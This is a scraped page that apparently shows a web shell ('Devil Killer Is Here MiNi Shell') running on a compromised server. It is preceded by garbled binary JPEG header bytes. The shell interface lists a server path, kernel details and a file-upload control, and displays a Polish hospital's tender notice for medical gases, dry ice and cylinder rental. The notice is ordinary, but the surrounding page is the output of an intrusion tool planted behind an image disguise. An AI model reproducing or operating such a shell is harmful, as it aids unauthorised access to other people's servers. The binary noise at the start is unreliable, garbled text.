JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250424/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250424/0020313701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa gazów medycznych, technicznych, suchego lodu oraz najem butli i zbiornika na ciekły tlen medyczny. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Leczenia Oparzeń im. dr. Stanisława Sakiela w Siemianowicach Śląskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272165010</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 73 57 630</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@clo.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.clo.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa gazów medycznych, technicznych, suchego lodu oraz najem butli i zbiornika na ciekły tlen medyczny. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bec92fdd-4e90-4f5b-8cae-0d35ab339580</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00203137</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00035440/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Gazy medyczne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://clo.ezamawiajacy.pl/pn/CLO/demand/207498/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://clo.ezamawiajacy.pl/pn/CLO/demand/207498/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej.<br/>2. W przedmiotowym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>elektronicznie wyłącznie poprzez Platformę pod adresem: https://clo.ezamawiajacy.pl<br/>3. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego.<br/>4. Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga od wykonawcy zarejestrowania<br/>się i zalogowania w systemie informatycznym dostępnym pod adresem https://clo.ezamawiajacy.pl, zgodnie z poniższą kolejnością.<br/>Rejestracja konta następuje automatycznie poprzez: podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym,<br/>osobistym lub profilem zaufanym) lub kontakt z numerem telefonu podanym w potwierdzeniu lub jeżeli użytkownik nie podpisze się<br/>na wniosku ani nie skontaktuje się telefonicznie, konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych. Mając to na<br/>uwadze, zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/>elektronicznej. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca biorący udział w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu<br/>rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>5. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert):<br/>5.1 W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa RM z dnia 30.12.2020 r. w spr. sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (dalej „rozporządzenie Prezesa RM<br/>w spr. wymagań dla dokumentów elektronicznych”) opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>5.2 Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa RM w sprawie wymagań dla<br/>dokumentów elektronicznych, przekazywane w postępowaniu sporządza się<br/>w postaci elektronicznej:<br/>5.2.1 w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 21.05.2024 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych (i przekazuje się jako załącznik), lub<br/>5.2.2 jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej.<br/>6. Formularz ofertowy podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W<br/>przypadku podpisania formularza ofertowego wariantem podpisu w typie zewnętrznym powstały oddzielny plik podpisu dla tego<br/>formularza należy załączyć.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CLO/ZP/07/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 1: <br/>1. Dostawy ciekłego tlenu medycznego w ilości 250 000 kg w trakcie obowiązywania umowy.<br/>2. Najem zbiornika na ciekły tlen o pojemność 4,5m3 – 5,5m3 wraz z parownicą o wydajności co najmniej 150 Nm3/h przy poborze ciągłym przez czas 10 godzin. <br/>W ramach najmu Wykonawca dokona dostawy, montażu, uruchomienia oraz przeszkoli z obsługi zbiornika personel Zamawiającego w siedzibie zamawiającego. <br/>W dniu pierwszej dostawy Wykonawca napełni tlenem medycznym i odda Zamawiającemu zbiornik do eksploatacji na okres obowiązywania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24111500-0 - Gazy medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">24111900-4 - Tlen</p> <p class="mb-0">44610000-9 - Zbiorniki, rezerwuary, pojemniki i zbiorniki ciśnieniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1: najniższa zaoferowana wartość brutto pakietu / wartość brutto pakietu badanej oferty x 100 pkt. Wynik: Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 2:<br/>1. Dostawy suchego lodu (zestalony dwutlenek węgla) w ilości 1190 kg. w formie granulatu o średnicy 3mm – 16 mm wraz z dostawą do siedziby Zamawiającego oraz przepakowaniem dostarczanego suchego lodu do pojemników Zamawiającego. <br/>Zamawiający przewiduje 17 dostaw każda po 70 kg w okresie obowiązywania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24112100-3 - Ditlenek węgla</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-24 do 2027-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1: najniższa zaoferowana wartość brutto pakietu / wartość brutto pakietu badanej oferty x 100 pkt. Wynik: Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 3:<br/>1. Dostawa sprężonego tlenu medycznego w ilości 230,4 m3 w trakcie obowiązywania umowy w butlach stalowych o pojemności wodnej 40 l i ciśnieniu roboczym 150 bar, każda zawierająca 6,4 m3 tlenu medycznego w warunkach normalnych (15 st. C) z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy. <br/>Zamawiający przewiduje jedną dostawę 230,4 m3 w 36 butlach 40 l w pierwszym dniu obowiązywania umowy.<br/>2. Korzystanie z opakowania do tlenu medycznego (najem butli) z pozycji 1 w ilości 26 280 butlo/dni stanowiącego butlę stalową o pojemności wodnej 40 l i ciśnieniu roboczym 150 bar, zawierająca 6,4 m3 tlenu medycznego <br/>w warunkach normalnych (15 st. C) z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy. <br/>3. Dostawy sprężonego tlenu medycznego w ilości 107,5 m3 w trakcie obowiązywania umowy w butlach aluminiowych <br/>o pojemności wodnej 10 l i ciśnieniu roboczym 200 bar, każda zawierająca 2,15 m3 tlenu medycznego w warunkach normalnych (15 st. C) z zintegrowanym reduktorem ciśnienia, manometrem wskazującym ciśnienie tlenu w butli, przepływomierzem o zakresie pracy 0,5 – 15 l/min, wyjściem do podłączenia maski tlenowej lub kaniuli donosowej oraz system szybkiego łączenia typu AGA (Quick Connector) do podłączenia urządzeń przenośnych wymagających dostarczenia tlenu medycznego np. do respiratora, z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>Zamawiający przewiduje pierwszą dostawę 30,1 m3 w 14 butlach 10 l w pierwszym dniu obowiązywania umowy.<br/>4. Korzystanie z opakowania do tlenu medycznego (najem butli) z pozycji 3 w ilości 10 220 butlo/dni stanowiącego butlę aluminiową o pojemności wodnej 10 l i ciśnieniu roboczym 200 bar, zawierająca 2,15 m3 tlenu medycznego <br/>w warunkach normalnych (15 st. C),z zintegrowanym reduktorem ciśnienia, manometrem wskazującym ciśnienie tlenu <br/>w butli, przepływomierzem o zakresie pracy 0,5 – 15 l/min, wyjściem do podłączenia maski tlenowej lub kaniuli donosowej oraz system szybkiego łączenia typu AGA (Quick Connector) do podłączenia urządzeń przenośnych wymagających dostarczenia tlenu medycznego np. do respiratora transportowego z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>5. Dostawy sprężonego tlenu medycznego w ilości 54 m3 w trakcie obowiązywania umowy w butlach aluminiowych <br/>o pojemności wodnej 5 l i ciśnieniu roboczym 200 bar, każda zawierająca 1,08 m3 tlenu medycznego w warunkach normalnych (15 st. C) z zintegrowanym reduktorem ciśnienia, manometrem wskazującym ciśnienie tlenu w butli, przepływomierzem o zakresie pracy 0,5 – 15 l/min, wyjściem do podłączenia maski tlenowej lub kaniuli donosowej oraz system szybkiego łączenia typu AGA (Quick Connector) do podłączenia urządzeń przenośnych wymagających dostarczenia tlenu medycznego np. do respiratora transportowego, z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>Zamawiający przewiduje pierwszą dostawę 15,12 m3 w 14 butlach 5 l w pierwszym dniu obowiązywania umowy.<br/>Kolejne dostawy będą realizowane sukcesywnie.<br/>6. Korzystanie z opakowania do tlenu medycznego (najem butli) z pozycji 5 w ilości 10 220 butlo/dni stanowiącego butlę aluminiową o pojemności wodnej 5 l i ciśnieniu roboczym 200 bar, zawierająca 1,08 m3 tlenu medycznego <br/>w warunkach normalnych (15 st. C), z zintegrowanym reduktorem ciśnienia, manometrem wskazującym ciśnienie tlenu <br/>w butli, przepływomierzem o zakresie pracy 0,5 – 15 l/min, wyjściem do podłączenia maski tlenowej lub kaniuli donosowej oraz system szybkiego łączenia typu AGA (Quick Connector) do podłączenia urządzeń przenośnych wymagających dostarczenia tlenu medycznego np. do respiratora transportowego z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>7. Dostawy sprężonego tlenu medycznego w ilości 5,16 m3 w trakcie obowiązywania umowy w butlach aluminiowych o pojemności wodnej 2 l i ciśnieniu roboczym 200 bar, każda zawierająca 0,43 m3 tlenu medycznego w warunkach normalnych (15 st. C) z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>Zamawiający przewiduje pierwszą dostawę 2,58 m3 w 6 butlach 2 l w pierwszym dniu obowiązywania umowy.<br/>Kolejne dostawy będą realizowane sukcesywnie.<br/>8. Korzystanie z opakowania do tlenu medycznego (najem butli) z pozycji 7 w ilości 4 380 butlo/dni stanowiącego butlę aluminiową o pojemności wodnej 2 l i ciśnieniu roboczym 200 bar, zawierająca 0,43 m3 tlenu medycznego <br/>w warunkach normalnych (15 st. C) z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>9. Dostawy skroplonego wyrobu medycznego dwutlenku węgla w ilości 2 340 kg w trakcie obowiązywania umowy <br/>w butlach stalowych o pojemności wodnej 40 l, zawierająca 26 kg medycznego dwutlenku węgla z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>Wymaga się aby wyrób medyczny dwutlenek węgla posiadał kartę charakterystyki oraz deklarację zgodności zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2017/745 z dnia 5 kwietnia 2017 r. w sprawie wyrobów medycznych, zmiany dyrektywy 2001/83/WE, rozporządzenia (WE) nr 178/2002 i rozporządzenia (WE) nr 1223/2009 oraz uchylenia dyrektyw Rady 90/385/EWG i 93/42/EWG. <br/>Zamawiający przewiduje pierwszą dostawę 364 kg w 14 butlach 40 l w pierwszym dniu obowiązywania umowy.<br/>Kolejne dostawy będą realizowane sukcesywnie.<br/>10. Korzystanie z opakowania do dwutlenku węgla (najem butli) z pozycji 9 w ilości 10 220 butlo/dni stanowiącego butlę stalową o pojemności wodnej 40 l, zawierająca 26 kg dwutlenku węgla z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>11. Dostawy skroplonego dwutlenku węgla w ilości 390 kg w trakcie obowiązywania umowy w butlach stalowych z rurką wgłębną o pojemności wodnej 40 l, zawierająca 26 kg dwutlenku węgla z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>Zamawiający przewiduje pierwszą dostawę 78 kg w 3 butlach 40 l w pierwszym dniu obowiązywania umowy.<br/>Kolejne dostawy będą realizowane sukcesywnie. <br/>12. Korzystanie z opakowania do dwutlenku węgla (najem butli) z pozycji 11 w ilości 2 190 butlo/dni stanowiącego butlę stalową z rurką wgłębną o pojemności wodnej 40 l, zawierająca 26 kg dwutlenku węgla z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy. <br/>13. Dostawy argonu technicznego o czystości 4.8 w ilości 3 m3 w trakcie obowiązywania umowy w butlach stalowych o pojemności wodnej 10 l i ciśnieniu roboczym 150 bar, zawierająca 1,5 m3 argonu technicznego z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>Zamawiający przewiduje pierwszą dostawę 1,5 m3 w 1 butli 10 l w pierwszym dniu obowiązywania umowy.<br/>Kolejna dostawa będzie zrealizowana sukcesywnie.<br/>14. Korzystanie z opakowania do argonu technicznego (najem butli) z pozycji 13 w ilości 365 butlo/dni stanowiącego butlę stalową pojemności wodnej 10 l i ciśnieniu roboczym 150 bar, zawierająca 1,5 m3 argonu technicznego z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>15. Dostawy argonu laboratoryjnego o czystości 5.2 w ilości 15 m3 w trakcie obowiązywania umowy w butlach stalowych o pojemności wodnej 10 l i ciśnieniu roboczym 150 bar, zawierająca 1,5 m3 argonu laboratoryjnego z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy.<br/>Zamawiający przewiduje pierwszą dostawę 1,5 m3 w 1 butli 10 l w pierwszym dniu obowiązywania umowy.<br/>Kolejne dostawy będą realizowane sukcesywnie.<br/>16. Korzystanie z opakowania do argonu laboratoryjnego (najem butli) z pozycji 15 w ilości 365 butlo/dni stanowiącego butlę stalowa o pojemności wodnej 10 l i ciśnieniu roboczym 150 bar, zawierająca 1,5 m3 argonu laboratoryjnego z ważną datą legalizacji przez okres minimum 24 m-cy od daty dostawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">24111500-0 - Gazy medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">24111100-6 - Argon</p> <p class="mb-0">24111900-4 - Tlen</p> <p class="mb-0">44610000-9 - Zbiorniki, rezerwuary, pojemniki i zbiorniki ciśnieniowe</p> <p class="mb-0">24112100-3 - Ditlenek węgla</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 